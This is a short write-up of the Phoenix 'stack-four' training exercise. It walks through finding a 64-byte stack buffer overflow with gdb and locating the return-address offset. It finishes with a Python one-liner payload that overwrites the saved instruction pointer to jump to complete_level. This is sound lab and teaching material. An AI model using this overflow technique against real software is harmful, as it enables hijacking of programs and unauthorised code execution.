02 February 2019

Stack 4

Write-up for: Stack Four

The goal is to redirect execution to complete_level by overflowing the saved instruction pointer.

Analyzing the binary / source reveals a stack buffer overflow in the start_level function.

char buffer[64];
void *ret;


This means by providing a buffer larger than 64 bytes, we can overflow the saved instruction pointer. The question is, where exactly is it relative to the buffer?

To find this out we run the binary with gdb, feed it exactly 64 bytes of input data, and look at the stack at the end of complete_level.

python -c 'print "A"*64' > ~/64_bytes
gdb stack-four
break *start_level+46
r < ~/64_bytes
x/x32w $esp

0xffffd5a0:     0xf7ffb1e0      0xffffd5bf      0x00000001      0x41414141
0xffffd5b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd5c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd5d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd5e0:     0x41414141      0x41414141      0x41414141      0x0804855c
0xffffd5f0:     0x08048610      0x00000000      0xffffd608      0x0804855c
0xffffd600:     0x00000000      0xffffd620      0xffffd69c      0xf7f8f654
0xffffd610:     0xffffd694      0x00000001      0xffffd69c      0xf7f8f654

As we can see, right after our buffer is the local variable retwhich contains the return address 0x0804855c which we also see one row below. This means the stored instruction pointer is at offfset sizeof(buffer) + 16.

After getting the address of complete_level via objdump, exploitation is trivial.

ser@phoenix-amd64:/opt/phoenix/i486$ objdump -t stack-four | grep complete_level
080484e5 g     F .text  00000020 complete_level


  1. Overflow buffer
  2. add 16 bytes of padding
  3. Overwrite EIP with address of complete_level
user@phoenix-amd64:/opt/phoenix/i486$ python -c 'print "A"*64+ "B"*16+"\x08\x04\x84\xe5"[::-1]' | ./stack-four
Welcome to phoenix/stack-four, brought to you by https://exploit.education
and will be returning to 0x80484e5
Congratulations, you've finished phoenix/stack-four :-) Well done!